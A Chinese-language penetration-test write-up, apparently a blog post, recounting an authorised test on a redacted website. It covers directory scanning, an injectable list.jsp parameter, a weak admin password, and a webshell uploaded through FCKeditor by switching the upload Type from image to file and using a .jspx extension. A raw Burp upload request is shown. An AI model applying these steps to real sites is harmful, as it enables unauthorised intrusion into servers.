渗透思路页面源代码查看

3 个月前文章归档 38

很早之前的测试记录，天下网站千千万，唯有思路最重要。

这个网站已经关闭，改版过，经授权测试。

御剑直接扫目录

扫描后台：http://www.XXXX.cn/admin

随便一找就是注入点 http://www.XXXX.cn/list.jsp?classid=17

跑数据账号admin 密码123456 一顿操作猛如虎，一看密码123456

直接登录进入

然后发现后台被阉割了，找不到上传地址什么的。但是用御剑扫目录扫到了fck
===========================

脑子一闪，从源代码查看一下，通过源码里面的一些链接找到线索。

然后点击那个超链接直接跳转到文章编辑的页面http://www.XXXX.cn/admin/index.jsp?mFrm=leftmenu4.jsp

因为之前就扫到是fck的编辑器，ok，直接添加图片，burp上传

POST /FCKeditor/editor/filemanager/upload/simpleuploader?Type=Image&colId=1&cid=1 HTTP/1.1
Host: www.lXXX.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.XXX.cn/FCKeditor/editor/dialog/fck_image.html
Cookie: JSESSIONID=A924385CB65ABA03EC6898D6552B5D7B
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------14887232939352
Content-Length: 194

-----------------------------14887232939352
Content-Disposition: form-data; name="NewFile"; filename="bbbb.jpg"
Content-Type: image/jpeg

111
-----------------------------14887232939352--

但是这里又出现毛病发现上传jsp TXT都提示成功但是访问都404

思考一小时，观察上传路径：/FCKeditor/editor/filemanager/upload/simpleuploader?Type=Image&colId=1&cid=1

发现上传的目录是type=image

考虑设置了image目录只能上传图片

然后把type改为file

成功上传

但是必须是jspx的马儿

jsp被GG掉，原因不明

总结：前面跑数据，扫后台都是常规操作，没亮点。亮点一、通过查看源码找到阉割之前的上传按钮
亮点二、上传成功但是不能执行，直接被杀，分析是不是上传目录问题，要不就是马儿不免杀，被杀软杀了。因为这两个问题在渗透测试中很常见。

“IT同路人”微信公众号

投稿邮箱：[email protected]

工欲善其事，必先利其器。